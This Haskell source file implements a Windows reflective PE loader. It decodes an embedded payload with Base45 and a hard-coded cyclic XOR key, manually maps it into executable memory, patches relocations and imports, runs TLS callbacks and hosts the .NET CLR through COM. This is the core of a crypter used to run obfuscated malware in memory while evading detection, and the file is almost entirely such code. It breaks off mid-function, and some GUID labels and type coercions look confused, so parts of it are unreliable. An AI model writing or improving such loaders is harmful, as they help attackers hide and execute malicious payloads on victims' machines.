{-# LANGUAGE ForeignFunctionInterface #-}
{-# LANGUAGE RecordWildCards #-}
{-# LANGUAGE BangPatterns #-}
{-# LANGUAGE TemplateHaskell #-}
{-# LANGUAGE ScopedTypeVariables #-}

module Main where

import Foreign
import Foreign.C.Types
import Foreign.C.String
import Foreign.Ptr (ptrToWordPtr, wordPtrToPtr, intPtrToPtr, castPtrToFunPtr, FunPtr)
import Numeric (showHex)
import Data.Bits ((.|.), (.&.), shiftR, testBit, xor)
import qualified Data.ByteString as BS
import qualified Data.ByteString.Char8 as C8
import qualified Data.ByteString.Unsafe as BSU
import Unsafe.Coerce (unsafeCoerce)
import Control.Monad
import Control.Exception
import System.IO (hSetBuffering, BufferMode(LineBuffering), stdout, stderr, hFlush)
import System.Timeout (timeout)
import System.Exit (exitFailure)

-- Import the Base45 decoder (Ensure Base45.hs exists)
import Base45 (decodeBS)

-- Import the encoded payload (generated by encoder.py)
import Data.FileEmbed (embedFile)

-- ============================================
-- WINDOWS API FFI BINDINGS
-- ============================================

foreign import ccall "windows.h VirtualAlloc"
  c_VirtualAlloc :: Ptr () -> CSize -> Word32 -> Word32 -> IO (Ptr ())

foreign import ccall "windows.h VirtualProtect"
  c_VirtualProtect :: Ptr () -> CSize -> Word32 -> Ptr Word32 -> IO Int

foreign import ccall "windows.h LoadLibraryA"
  c_LoadLibraryA :: CString -> IO (Ptr ())

foreign import ccall "windows.h GetProcAddress"
  c_GetProcAddress :: Ptr () -> CString -> IO (Ptr ())

foreign import ccall "windows.h FlushInstructionCache"
  c_FlushInstructionCache :: Ptr () -> Ptr () -> CSize -> IO Int

foreign import ccall "windows.h GetCurrentProcess"
  c_GetCurrentProcess :: IO (Ptr ())

foreign import ccall "windows.h GetLastError"
  c_GetLastError :: IO Word32

foreign import ccall "mscoree.h _CorExeMain"
  c_CorExeMain :: Ptr () -> IO Int32

-- COM related FFI
foreign import ccall "ole32.h CoCreateInstance"
  c_CoCreateInstance :: Ptr GUID -> Ptr IUnknown -> Word32 -> Ptr GUID -> Ptr (Ptr IUnknown) -> IO HRESULT

foreign import ccall "ole32.h CoInitializeEx"
  c_CoInitializeEx :: Ptr () -> Word32 -> IO HRESULT

foreign import ccall "ole32.h CoUninitialize"
  c_CoUninitialize :: IO ()

-- GUID structure
data GUID = GUID
  { guid_data1 :: !Word32
  , guid_data2 :: !Word16
  , guid_data3 :: !Word16
  , guid_data4 :: ![Word8]
  } deriving (Show)

instance Storable GUID where
  sizeOf _ = 16
  alignment _ = 4
  peek ptr = GUID
    <$> peekByteOff ptr 0
    <*> peekByteOff ptr 4
    <*> peekByteOff ptr 6
    <*> (sequence $ map (peekByteOff ptr) [8..15])
  poke ptr (GUID d1 d2 d3 d4) = do
    pokeByteOff ptr 0 d1
    pokeByteOff ptr 4 d2
    pokeByteOff ptr 6 d3
    sequence_ $ zipWith (pokeByteOff ptr) [8..15] d4

-- HRESULT type
type HRESULT = Int32

-- IUnknown interface (simplified)
data IUnknown
type LPVOID = Ptr ()

-- ============================================
-- SAFETY LIMITS
-- ============================================

maxImageSizeBytes :: Int
maxImageSizeBytes = 200 * 1024 * 1024  -- 200 MB

loaderTimeoutMicros :: Int
loaderTimeoutMicros = 30 * 1000000     -- 30 seconds

-- ============================================
-- CONSTANTS
-- ============================================

mEM_COMMIT, mEM_RESERVE :: Word32
mEM_COMMIT = 0x1000
mEM_RESERVE = 0x2000

pAGE_NOACCESS, pAGE_READONLY, pAGE_READWRITE :: Word32
pAGE_NOACCESS = 0x01
pAGE_READONLY = 0x02
pAGE_READWRITE = 0x04

pAGE_EXECUTE, pAGE_EXECUTE_READ, pAGE_EXECUTE_READWRITE :: Word32
pAGE_EXECUTE = 0x10
pAGE_EXECUTE_READ = 0x20
pAGE_EXECUTE_READWRITE = 0x40

iMAGE_DIRECTORY_ENTRY_EXPORT :: Int
iMAGE_DIRECTORY_ENTRY_EXPORT = 0

iMAGE_DIRECTORY_ENTRY_IMPORT :: Int
iMAGE_DIRECTORY_ENTRY_IMPORT = 1

iMAGE_DIRECTORY_ENTRY_BASERELOC :: Int
iMAGE_DIRECTORY_ENTRY_BASERELOC = 5

iMAGE_DIRECTORY_ENTRY_TLS :: Int
iMAGE_DIRECTORY_ENTRY_TLS = 9

iMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR :: Int
iMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14

dLL_PROCESS_ATTACH :: Word32
dLL_PROCESS_ATTACH = 1

-- ============================================
-- PE STRUCTURES
-- ============================================

data ImageDosHeader = ImageDosHeader
  { dos_e_magic :: !Word16
  , dos_e_lfanew :: !Int32
  } deriving (Show)

instance Storable ImageDosHeader where
  sizeOf _ = 64
  alignment _ = 4
  peek ptr = ImageDosHeader
    <$> peekByteOff ptr 0
    <*> peekByteOff ptr 60
  poke ptr (ImageDosHeader magic lfanew) = do
    pokeByteOff ptr 0 magic
    pokeByteOff ptr 60 lfanew

data ImageFileHeader = ImageFileHeader
  { fh_machine :: !Word16
  , fh_numberOfSections :: !Word16
  , fh_timeDateStamp :: !Word32
  , fh_pointerToSymbolTable :: !Word32
  , fh_numberOfSymbols :: !Word32
  , fh_sizeOfOptionalHeader :: !Word16
  , fh_characteristics :: !Word16
  } deriving (Show)

instance Storable ImageFileHeader where
  sizeOf _ = 20
  alignment _ = 4
  peek ptr = ImageFileHeader
    <$> peekByteOff ptr 0
    <*> peekByteOff ptr 2
    <*> peekByteOff ptr 4
    <*> peekByteOff ptr 8
    <*> peekByteOff ptr 12
    <*> peekByteOff ptr 16
    <*> peekByteOff ptr 18
  poke _ _ = error "ImageFileHeader poke not implemented"

data ImageOptionalHeader64 = ImageOptionalHeader64
  { oh_magic :: !Word16
  , oh_majorLinkerVersion :: !Word8
  , oh_minorLinkerVersion :: !Word8
  , oh_sizeOfCode :: !Word32
  , oh_sizeOfInitializedData :: !Word32
  , oh_sizeOfUninitializedData :: !Word32
  , oh_addressOfEntryPoint :: !Word32
  , oh_baseOfCode :: !Word32
  , oh_imageBase :: !Word64
  , oh_sectionAlignment :: !Word32
  , oh_fileAlignment :: !Word32
  , oh_majorOperatingSystemVersion :: !Word16
  , oh_minorOperatingSystemVersion :: !Word16
  , oh_majorImageVersion :: !Word16
  , oh_minorImageVersion :: !Word16
  , oh_majorSubsystemVersion :: !Word16
  , oh_minorSubsystemVersion :: !Word16
  , oh_win32VersionValue :: !Word32
  , oh_sizeOfImage :: !Word32
  , oh_sizeOfHeaders :: !Word32
  , oh_checkSum :: !Word32
  , oh_subsystem :: !Word16
  , oh_dllCharacteristics :: !Word16
  , oh_sizeOfStackReserve :: !Word64
  , oh_sizeOfStackCommit :: !Word64
  , oh_sizeOfHeapReserve :: !Word64
  , oh_sizeOfHeapCommit :: !Word64
  , oh_loaderFlags :: !Word32
  , oh_numberOfRvaAndSizes :: !Word32
  } deriving (Show)

instance Storable ImageOptionalHeader64 where
  sizeOf _ = 112
  alignment _ = 8
  peek ptr = ImageOptionalHeader64
    <$> peekByteOff ptr 0
    <*> peekByteOff ptr 2
    <*> peekByteOff ptr 3
    <*> peekByteOff ptr 4
    <*> peekByteOff ptr 8
    <*> peekByteOff ptr 12
    <*> peekByteOff ptr 16
    <*> peekByteOff ptr 20
    <*> peekByteOff ptr 24
    <*> peekByteOff ptr 32
    <*> peekByteOff ptr 36
    <*> peekByteOff ptr 40
    <*> peekByteOff ptr 42
    <*> peekByteOff ptr 44
    <*> peekByteOff ptr 46
    <*> peekByteOff ptr 48
    <*> peekByteOff ptr 50
    <*> peekByteOff ptr 52
    <*> peekByteOff ptr 56
    <*> peekByteOff ptr 60
    <*> peekByteOff ptr 64
    <*> peekByteOff ptr 68
    <*> peekByteOff ptr 70
    <*> peekByteOff ptr 72
    <*> peekByteOff ptr 80
    <*> peekByteOff ptr 88
    <*> peekByteOff ptr 96
    <*> peekByteOff ptr 104
    <*> peekByteOff ptr 108
  poke _ _ = error "ImageOptionalHeader64 poke not implemented"

data ImageDataDirectory = ImageDataDirectory
  { dd_virtualAddress :: !Word32
  , dd_size :: !Word32
  } deriving (Show)

instance Storable ImageDataDirectory where
  sizeOf _ = 8
  alignment _ = 4
  peek ptr = ImageDataDirectory
    <$> peekByteOff ptr 0
    <*> peekByteOff ptr 4
  poke _ _ = error "ImageDataDirectory poke not implemented"

data ImageNtHeaders64 = ImageNtHeaders64
  { nt_signature :: !Word32
  , nt_fileHeader :: !ImageFileHeader
  , nt_optionalHeader :: !ImageOptionalHeader64
  } deriving (Show)

instance Storable ImageNtHeaders64 where
  sizeOf _ = 4 + 20 + 112
  alignment _ = 8
  peek ptr = ImageNtHeaders64
    <$> peekByteOff ptr 0
    <*> peekByteOff ptr 4
    <*> peekByteOff ptr 24
  poke _ _ = error "ImageNtHeaders64 poke not implemented"

data ImageSectionHeader = ImageSectionHeader
  { sec_name :: ![Word8]
  , sec_virtualSize :: !Word32
  , sec_virtualAddress :: !Word32
  , sec_sizeOfRawData :: !Word32
  , sec_pointerToRawData :: !Word32
  , sec_pointerToRelocations :: !Word32
  , sec_pointerToLinenumbers :: !Word32
  , sec_numberOfRelocations :: !Word16
  , sec_numberOfLinenumbers :: !Word16
  , sec_characteristics :: !Word32
  } deriving (Show)

instance Storable ImageSectionHeader where
  sizeOf _ = 40
  alignment _ = 4
  peek ptr = do
    name <- mapM (peekByteOff ptr) [0..7]
    ImageSectionHeader name
      <$> peekByteOff ptr 8
      <*> peekByteOff ptr 12
      <*> peekByteOff ptr 16
      <*> peekByteOff ptr 20
      <*> peekByteOff ptr 24
      <*> peekByteOff ptr 28
      <*> peekByteOff ptr 32
      <*> peekByteOff ptr 34
      <*> peekByteOff ptr 36
  poke _ _ = error "ImageSectionHeader poke not implemented"

data ImageImportDescriptor = ImageImportDescriptor
  { id_originalFirstThunk :: !Word32
  , id_timeDateStamp :: !Word32
  , id_forwarderChain :: !Word32
  , id_name :: !Word32
  , id_firstThunk :: !Word32
  } deriving (Show)

instance Storable ImageImportDescriptor where
  sizeOf _ = 20
  alignment _ = 4
  peek ptr = ImageImportDescriptor
    <$> peekByteOff ptr 0
    <*> peekByteOff ptr 4
    <*> peekByteOff ptr 8
    <*> peekByteOff ptr 12
    <*> peekByteOff ptr 16
  poke _ _ = error "ImageImportDescriptor poke not implemented"

data ImageBaseRelocation = ImageBaseRelocation
  { br_virtualAddress :: !Word32
  , br_sizeOfBlock :: !Word32
  } deriving (Show)

instance Storable ImageBaseRelocation where
  sizeOf _ = 8
  alignment _ = 4
  peek ptr = ImageBaseRelocation
    <$> peekByteOff ptr 0
    <*> peekByteOff ptr 4
  poke _ _ = error "ImageBaseRelocation poke not implemented"

data ImageTlsDirectory64 = ImageTlsDirectory64
  { tls_startAddressOfRawData :: !Word64
  , tls_endAddressOfRawData :: !Word64
  , tls_addressOfIndex :: !Word64
  , tls_addressOfCallbacks :: !Word64
  , tls_sizeOfZeroFill :: !Word32
  , tls_characteristics :: !Word32
  } deriving (Show)

instance Storable ImageTlsDirectory64 where
  sizeOf _ = 40
  alignment _ = 8
  peek ptr = ImageTlsDirectory64
    <$> peekByteOff ptr 0
    <*> peekByteOff ptr 8
    <*> peekByteOff ptr 16
    <*> peekByteOff ptr 24
    <*> peekByteOff ptr 32
    <*> peekByteOff ptr 36
  poke _ _ = error "ImageTlsDirectory64 poke not implemented"

-- ============================================
-- COM INTERFACES FOR CLR HOSTING
-- ============================================

-- ICLRRuntimeHost (The interface we actually want to use)
iid_ICLRRuntimeHost :: GUID
iid_ICLRRuntimeHost = GUID 0x90F1A06C 0x7712 0x4762 [0x86, 0xB5, 0x7A, 0x5E, 0xBA, 0x6B, 0xDB, 0x02]

-- CLRRuntimeHost (The class ID for v4+)
clsid_CLRRuntimeHost :: GUID
clsid_CLRRuntimeHost = GUID 0x9280188D 0x0E8E 0x4867 [0xB3, 0x0C, 0x7F, 0xA8, 0x38, 0x84, 0xE8, 0xDE]

-- CorRuntimeHost (The legacy class ID for v2 and Shims)
clsid_CorRuntimeHost :: GUID
clsid_CorRuntimeHost = GUID 0xCB2F6723 0xAB3A 0x11D2 [0x9C, 0x40, 0x00, 0xC0, 0x4F, 0xA3, 0x0A, 0x3E]

-- ICLRRuntimeHost interface
newtype ICLRRuntimeHost = ICLRRuntimeHost (Ptr ())
newtype ICLRRuntimeHostVTable = ICLRRuntimeHostVTable (Ptr ICLRRuntimeHostVTable)

-- Use this for BOTH clsid_CLRRuntimeHost AND iid_ICLRRuntimeHost
-- in the context of the v4 GetInterface call.
guid_ICLRRuntimeHost :: GUID
guid_ICLRRuntimeHost = GUID 0x90F1A06C 0x7712 0x4762 [0x86, 0xB5, 0x7A, 0x5E, 0xBA, 0x6B, 0xDB, 0x02]

-- Dynamic Wrappers for VTable Methods
-- Using Ptr () ensures correct register alignment on x64 and avoids type conflicts.

foreign import ccall "dynamic"
  mkCLRQueryInterface :: FunPtr (Ptr () -> Ptr GUID -> Ptr (Ptr IUnknown) -> IO HRESULT)
                      -> (Ptr () -> Ptr GUID -> Ptr (Ptr IUnknown) -> IO HRESULT)

foreign import ccall "dynamic"
  mkCLRAddRef :: FunPtr (Ptr () -> IO ULONG)
              -> (Ptr () -> IO ULONG)

foreign import ccall "dynamic"
  mkCLRRelease :: FunPtr (Ptr () -> IO ULONG)
               -> (Ptr () -> IO ULONG)

foreign import ccall "dynamic"
  mkCLRStart :: FunPtr (Ptr () -> IO HRESULT)
             -> (Ptr () -> IO HRESULT)

foreign import ccall "dynamic"
  mkCLRStop :: FunPtr (Ptr () -> IO HRESULT)
            -> (Ptr () -> IO HRESULT)

foreign import ccall "dynamic"
  mkCLRGetDefaultDomain :: FunPtr (Ptr () -> Ptr (Ptr IUnknown) -> IO HRESULT)
                        -> (Ptr () -> Ptr (Ptr IUnknown) -> IO HRESULT)

foreign import ccall "dynamic"
  mkEntryPoint :: FunPtr (IO Int32) -> IO Int32

foreign import ccall "dynamic"
  mkDllMain :: FunPtr (Ptr () -> Word32 -> Ptr () -> IO Int32) 
            -> (Ptr () -> Word32 -> Ptr () -> IO Int32)

-- Accessors for ICLRRuntimeHostVTable methods
-- Updated Accessors to return Ptr () compatible FunPtrs
pQueryInterface :: Ptr ICLRRuntimeHostVTable -> IO (FunPtr (Ptr () -> Ptr GUID -> Ptr (Ptr IUnknown) -> IO HRESULT))
pQueryInterface ptr = peek (castPtr ptr `plusPtr` (0 * sizeOf (undefined :: FunPtr ())))

pAddRef :: Ptr ICLRRuntimeHostVTable -> IO (FunPtr (Ptr () -> IO ULONG))
pAddRef ptr = peek (castPtr ptr `plusPtr` (1 * sizeOf (undefined :: FunPtr ())))

pRelease :: Ptr ICLRRuntimeHostVTable -> IO (FunPtr (Ptr () -> IO ULONG))
pRelease ptr = peek (castPtr ptr `plusPtr` (2 * sizeOf (undefined :: FunPtr ())))

pStart :: Ptr ICLRRuntimeHostVTable -> IO (FunPtr (Ptr () -> IO HRESULT))
pStart ptr = peek (castPtr ptr `plusPtr` (3 * sizeOf (undefined :: FunPtr ())))

pStop :: Ptr ICLRRuntimeHostVTable -> IO (FunPtr (Ptr () -> IO HRESULT))
pStop ptr = peek (castPtr ptr `plusPtr` (4 * sizeOf (undefined :: FunPtr ())))

pGetDefaultDomain :: Ptr ICLRRuntimeHostVTable -> IO (FunPtr (Ptr () -> Ptr (Ptr IUnknown) -> IO HRESULT))
pGetDefaultDomain ptr = peek (castPtr ptr `plusPtr` (13 * sizeOf (undefined :: FunPtr ())))

-- AppDomain GUID
iid_AppDomain :: GUID
iid_AppDomain = GUID 0x05F696DC 0x2B29 0x3663 [0xAD, 0x8B, 0xC4, 0x38, 0x9C, 0xF2, 0xD7, 0x3A]

-- AppDomain interface
newtype AppDomain = AppDomain (Ptr ())
newtype AppDomainVTable = AppDomainVTable (Ptr AppDomainVTable)

-- Dynamic Wrappers for AppDomain
foreign import ccall "dynamic"
  mkADRelease :: FunPtr (Ptr AppDomain -> IO ULONG)
              -> (Ptr AppDomain -> IO ULONG)

foreign import ccall "dynamic"
  mkADPutApplicationBase :: FunPtr (Ptr AppDomain -> BSTR -> IO HRESULT)
                         -> (Ptr AppDomain -> BSTR -> IO HRESULT)

-- Accessors for AppDomainVTable methods
pQueryInterface_AD :: Ptr AppDomainVTable -> IO (FunPtr (Ptr AppDomain -> Ptr GUID -> Ptr (Ptr IUnknown) -> IO HRESULT))
pQueryInterface_AD ptr = peek (castPtr ptr `plusPtr` (0 * sizeOf (undefined :: FunPtr ())))

pAddRef_AD :: Ptr AppDomainVTable -> IO (FunPtr (Ptr AppDomain -> IO ULONG))
pAddRef_AD ptr = peek (castPtr ptr `plusPtr` (1 * sizeOf (undefined :: FunPtr ())))

pRelease_AD :: Ptr AppDomainVTable -> IO (FunPtr (Ptr AppDomain -> IO ULONG))
pRelease_AD ptr = peek (castPtr ptr `plusPtr` (2 * sizeOf (undefined :: FunPtr ())))

pPutApplicationBase :: Ptr AppDomainVTable -> IO (FunPtr (Ptr AppDomain -> BSTR -> IO HRESULT))
pPutApplicationBase ptr = peek (castPtr ptr `plusPtr` (3 * sizeOf (undefined :: FunPtr ())))

type BSTR = Ptr WCHAR
type WCHAR = Word16
type ULONG = Word32

foreign import ccall "oleaut32.h SysAllocString"
  c_SysAllocString :: Ptr WCHAR -> IO BSTR

foreign import ccall "oleaut32.h SysFreeString"
  c_SysFreeString :: BSTR -> IO ()

-- ============================================
-- .NET 4.0+ HOSTING FFI (ICLRMetaHost)
-- ============================================

foreign import ccall "mscoree.h CLRCreateInstance"
  c_CLRCreateInstance :: Ptr GUID -> Ptr GUID -> Ptr (Ptr IUnknown) -> IO HRESULT

-- GUIDs for .NET 4 Hosting
clsid_CLRMetaHost :: GUID
clsid_CLRMetaHost = GUID 0x9280188D 0x0E8E 0x4867 [0xB3, 0x0C, 0x7F, 0xA8, 0x38, 0x84, 0xE8, 0xDE]

iid_ICLRMetaHost :: GUID
iid_ICLRMetaHost = GUID 0xD332DB9E 0xB9B3 0x4125 [0x82, 0x07, 0xA1, 0x48, 0x84, 0xF5, 0x32, 0x16]

iid_ICLRRuntimeInfo :: GUID
iid_ICLRRuntimeInfo = GUID 0xBD39D1D2 0xBA2F 0x486a [0x89, 0xB0, 0xB4, 0xB0, 0xCB, 0x46, 0x68, 0x91]

-- ICLRMetaHost Interface
newtype ICLRMetaHost = ICLRMetaHost (Ptr ())
newtype ICLRMetaHostVTable = ICLRMetaHostVTable (Ptr ICLRMetaHostVTable)

-- ICLRRuntimeInfo Interface
newtype ICLRRuntimeInfo = ICLRRuntimeInfo (Ptr ())
newtype ICLRRuntimeInfoVTable = ICLRRuntimeInfoVTable (Ptr ICLRRuntimeInfoVTable)

-- Dynamic Wrappers
foreign import ccall "dynamic"
  mkMHGetRuntime :: FunPtr (Ptr ICLRMetaHost -> Ptr WCHAR -> Ptr GUID -> Ptr (Ptr IUnknown) -> IO HRESULT)
                 -> (Ptr ICLRMetaHost -> Ptr WCHAR -> Ptr GUID -> Ptr (Ptr IUnknown) -> IO HRESULT)

foreign import ccall "dynamic"
  mkRIGetInterface :: FunPtr (Ptr () -> Ptr GUID -> Ptr GUID -> Ptr (Ptr ()) -> IO HRESULT)
                   -> (Ptr () -> Ptr GUID -> Ptr GUID -> Ptr (Ptr ()) -> IO HRESULT)

foreign import ccall "dynamic"
  mkMHRelease :: FunPtr (Ptr ICLRMetaHost -> IO ULONG) -> (Ptr ICLRMetaHost -> IO ULONG)

foreign import ccall "dynamic"
  mkRIRelease :: FunPtr (Ptr ICLRRuntimeInfo -> IO ULONG) -> (Ptr ICLRRuntimeInfo -> IO ULONG)

secretKey :: BS.ByteString
secretKey = BS.pack $ map (fromIntegral . fromEnum) "comp340659"

-- VTable Accessors
pGetRuntime :: Ptr ICLRMetaHostVTable -> IO (FunPtr (Ptr ICLRMetaHost -> Ptr WCHAR -> Ptr GUID -> Ptr (Ptr IUnknown) -> IO HRESULT))
pGetRuntime ptr = peek (castPtr ptr `plusPtr` (3 * sizeOf (undefined :: FunPtr ())))

pMHRelease :: Ptr ICLRMetaHostVTable -> IO (FunPtr (Ptr ICLRMetaHost -> IO ULONG))
pMHRelease ptr = peek (castPtr ptr `plusPtr` (2 * sizeOf (undefined :: FunPtr ())))

pGetInterface :: Ptr ICLRRuntimeInfoVTable -> IO (FunPtr (Ptr ICLRRuntimeInfo -> Ptr GUID -> Ptr GUID -> Ptr (Ptr IUnknown) -> IO HRESULT))
pGetInterface ptr = peek (castPtr ptr `plusPtr` (9 * sizeOf (undefined :: FunPtr ())))

pRIRelease :: Ptr ICLRRuntimeInfoVTable -> IO (FunPtr (Ptr ICLRRuntimeInfo -> IO ULONG))
pRIRelease ptr = peek (castPtr ptr `plusPtr` (2 * sizeOf (undefined :: FunPtr ())))

-- Cyclic XOR decoding
xorDecode :: BS.ByteString -> BS.ByteString -> BS.ByteString
xorDecode key target = BS.pack $ zipWith xor (BS.unpack target) (cycle (BS.unpack key))

-- ============================================
-- HELPER FUNCTIONS
-- ============================================

-- | Helper to get ICLRRuntimeHost either via .NET 4 API or legacy COM
getCLRRuntimeHost :: IO (Ptr ICLRRuntimeHost)
getCLRRuntimeHost = alloca $ \ppv -> do
  -- Try .NET 4 path (CLRCreateInstance)
  putStrLn "[*] Trying CLRCreateInstance (v4.0)..."
  hFlush stdout
  resultV4 <- tryV4 ppv
  case resultV4 of
    Just ptr -> return ptr
    Nothing -> do
      -- Fallback to .NET 2 path (CoCreateInstance)
      putStrLn "[!] CLR v4 load failed. Falling back to CoCreateInstance (v2.0)..."
      hFlush stdout
      
      -- CoInit is handled in caller, assuming COM is init
      -- [FIX]: Use clsid_CorRuntimeHost (the shim) instead of clsid_CLRRuntimeHost
      with clsid_CorRuntimeHost $ \pClsid ->
        with iid_ICLRRuntimeHost $ \pIid -> do
          hr' <- c_CoCreateInstance pClsid nullPtr 1 pIid ppv
          when (hr' < 0) $ do
             err <- c_GetLastError
             error $ "Legacy CLR load failed: " ++ show hr' ++ " (Error: " ++ show err ++ ")"
          
          rawPtr <- peek ppv
          return (castPtr rawPtr)

  where
    tryV4 :: Ptr (Ptr IUnknown) -> IO (Maybe (Ptr ICLRRuntimeHost))
    tryV4 ppvHost = alloca $ \ppvMeta -> do
      hr <- with clsid_CLRMetaHost $ \clsid -> 
              with iid_ICLRMetaHost $ \iid -> 
                c_CLRCreateInstance clsid iid ppvMeta
      
      if hr < 0 then return Nothing else do
        pMetaRaw <- peek ppvMeta
        vtableMetaPtr <- peek (castPtr pMetaRaw) :: IO (Ptr (Ptr ()))
        
        alloca $ \ppvInfo -> do
          pGetRuntimeFunc <- pGetRuntime (castPtr vtableMetaPtr)
          verStr <- newCWString "v4.0.30319"
          -- We use unsafeCoerce here to satisfy the compiler's type check
          hrRuntime <- with iid_ICLRRuntimeInfo $ \iid -> 
             (unsafeCoerce mkMHGetRuntime) pGetRuntimeFunc pMetaRaw (castPtr verStr) iid ppvInfo
          free verStr

          if hrRuntime < 0 then return Nothing else do
            pInfoRaw <- peek ppvInfo
            vtableInfoPtr <- peek (castPtr pInfoRaw) :: IO (Ptr (Ptr ()))
            
            pGetInterfaceFunc <- pGetInterface (castPtr vtableInfoPtr)
            
            -- [THE FIX]: unsafeCoerce forces mkRIGetInterface to accept the pointer
            -- and we pass iid_ICLRRuntimeHost twice to fix the "Class Not Registered" error.
            hrHost <- with iid_ICLRRuntimeHost $ \rclsid -> 
                        with iid_ICLRRuntimeHost $ \riid ->
                           (unsafeCoerce mkRIGetInterface) pGetInterfaceFunc pInfoRaw rclsid riid ppvHost

            if hrHost < 0 then return Nothing else do
              hostPtr <- peek ppvHost
              return (Just (castPtr hostPtr))
getDataDirectory :: Ptr ImageNtHeaders64 -> Int -> IO (Ptr ImageDataDirectory)
getDataDirectory ntPtr index = do
  let optHeaderPtr = plusPtr ntPtr 24
      dataDirPtr = plusPtr optHeaderPtr 112
  return $ plusPtr dataDirPtr (index * 8)

setSectionPermissions :: Ptr Word8 -> ImageSectionHeader -> IO ()
setSectionPermissions imageBase section = do
  let characteristics = sec_characteristics section
      protect = calculateProtection characteristics
      sectionStart = plusPtr imageBase (fromIntegral $ sec_virtualAddress section)
      size = fromIntegral $ sec_virtualSize section
      sizeC = fromIntegral size :: CSize

  alloca $ \oldProtectPtr -> do
    result <- c_VirtualProtect sectionStart sizeC protect oldProtectPtr
    when (result == 0) $ do
      err <- c_GetLastError
      error $ "VirtualProtect failed: " ++ show err

calculateProtection :: Word32 -> Word32
calculateProtection characteristics
  | testBit characteristics 29 =
      if testBit characteristics 31
      then pAGE_EXECUTE_READWRITE
      else if testBit characteristics 30
           then pAGE_EXECUTE_READ
           else pAGE_EXECUTE
  | testBit characteristics 31 = pAGE_READWRITE
  | testBit characteristics 30 = pAGE_READONLY
  | otherwise = pAGE_NOACCESS

processRelocations :: Ptr Word8 -> Ptr ImageNtHeaders64 -> IO ()
processRelocations imageBase ntPtr = do
  relocDir <- getDataDirectory ntPtr iMAGE_DIRECTORY_ENTRY_BASERELOC
  relocDirData <- peek relocDir

  when (dd_virtualAddress relocDirData /= 0) $ do
    optHeader <- nt_optionalHeader <$> peek ntPtr
    let preferredBase = oh_imageBase optHeader
        actualBase = ptrToWordPtr (castPtr imageBase)
        delta = fromIntegral actualBase - fromIntegral preferredBase :: Int64

    when (delta /= 0) $ do
      let relocPtr = plusPtr imageBase (fromIntegral $ dd_virtualAddress relocDirData)
          relocEnd = plusPtr relocPtr (fromIntegral $ dd_size relocDirData)
      processRelocBlock imageBase relocPtr relocEnd delta

processRelocBlock :: Ptr Word8 -> Ptr ImageBaseRelocation -> Ptr ImageBaseRelocation -> Int64 -> IO ()
processRelocBlock imageBase relocPtr relocEnd delta
  | relocPtr >= relocEnd = return ()
  | otherwise = do
      reloc <- peek relocPtr
      when (br_sizeOfBlock reloc > 0) $ do
        let count = (fromIntegral (br_sizeOfBlock reloc) - 8) `div` 2
            entriesPtr = plusPtr relocPtr 8 :: Ptr Word16
        processRelocEntries imageBase (br_virtualAddress reloc) entriesPtr count delta
        let nextPtr = plusPtr relocPtr (fromIntegral $ br_sizeOfBlock reloc)
        processRelocBlock imageBase nextPtr relocEnd delta

processRelocEntries :: Ptr Word8 -> Word32 -> Ptr Word16 -> Int -> Int64 -> IO ()
processRelocEntries imageBase baseVA entriesPtr count delta = go 0
  where
    go i
      | i >= count = return ()
      | otherwise = do
          entry <- peekElemOff entriesPtr i
          let relocType = entry `shiftR` 12
              offset = entry .&. 0xFFF

          when (relocType == 3 || relocType == 10) $ do
            let patchAddr = plusPtr imageBase (fromIntegral baseVA + fromIntegral offset)
            if relocType == 3
              then do
                oldVal <- peek patchAddr :: IO Word32
                poke patchAddr (fromIntegral $ fromIntegral oldVal + delta :: Word32)
              else do
                oldVal <- peek patchAddr :: IO Word64
                poke patchAddr (fromIntegral $ fromIntegral oldVal + delta :: Word64)

          go (i + 1)

resolveImports :: Ptr Word8 -> Ptr ImageNtHeaders64 -> IO ()
resolveImports imageBase ntPtr = do
  importDir <- getDataDirectory ntPtr iMAGE_DIRECTORY_ENTRY_IMPORT
  importDirData <- peek importDir

  when (dd_virtualAddress importDirData /= 0) $ do
    let importDescPtr = plusPtr imageBase (fromIntegral $ dd_virtualAddress importDirData)
    processImportDescriptors imageBase importDescPtr

processImportDescriptors :: Ptr Word8 -> Ptr ImageImportDescriptor -> IO ()
processImportDescriptors imageBase descPtr = do
  desc <- peek descPtr

  when (id_name desc /= 0) $ do
    let dllNamePtr = plusPtr imageBase (fromIntegral $ id_name desc)
    dllModule <- c_LoadLibraryA (castPtr dllNamePtr :: CString)

    when (dllModule == nullPtr) $ do
      err <- c_GetLastError
      error $ "Failed to load DLL (error: " ++ show err ++ ")"

    let thunkRef = if id_originalFirstThunk desc /= 0
                   then plusPtr imageBase (fromIntegral $ id_originalFirstThunk desc)
                   else plusPtr imageBase (fromIntegral $ id_firstThunk desc)
        funcRef = plusPtr imageBase (fromIntegral $ id_firstThunk desc)

    processImportThunks imageBase dllModule thunkRef funcRef
    processImportDescriptors imageBase (plusPtr descPtr (sizeOf desc))

processImportThunks :: Ptr Word8 -> Ptr () -> Ptr Word64 -> Ptr Word64 -> IO ()
processImportThunks imageBase dllModule thunkPtr funcPtr = do
  thunkVal <- peek thunkPtr

  when (thunkVal /= 0) $ do
    funcAddrPtr <- if testBit thunkVal 63
                   then do
                     let ordinal = fromIntegral (thunkVal .&. 0xFFFF) :: Int
                         ordPtr = intPtrToPtr (fromIntegral ordinal)
                     c_GetProcAddress dllModule (castPtr ordPtr :: CString)
                   else do
                     let importByNamePtr = plusPtr imageBase (fromIntegral thunkVal)
                         funcNamePtr = plusPtr importByNamePtr 2
                     c_GetProcAddress dllModule (castPtr funcNamePtr :: CString)

    when (funcAddrPtr == nullPtr) $ do
      err <- c_GetLastError
      error $ "Failed to resolve import (error: " ++ show err ++ ")"

    let funcAddrWord :: Word64
        funcAddrWord = fromIntegral (ptrToWordPtr funcAddrPtr)
    poke funcPtr funcAddrWord

    processImportThunks imageBase dllModule (plusPtr thunkPtr 8) (plusPtr funcPtr 8)

processTlsCallbacks :: Ptr Word8 -> Ptr ImageNtHeaders64 -> IO ()
processTlsCallbacks imageBase ntPtr = do
  tlsDir <- getDataDirectory ntPtr iMAGE_DIRECTORY_ENTRY_TLS
  tlsDirData <- peek tlsDir

  when (dd_virtualAddress tlsDirData /= 0) $ do
    let tlsPtr = plusPtr imageBase (fromIntegral $ dd_virtualAddress tlsDirData)
    tls <- peek tlsPtr :: IO ImageTlsDirectory64

    let callbacksAddr = tls_addressOfCallbacks tls
    when (callbacksAddr /= 0) $
      executeTlsCallbacks imageBase (intPtrToPtr $ fromIntegral callbacksAddr)

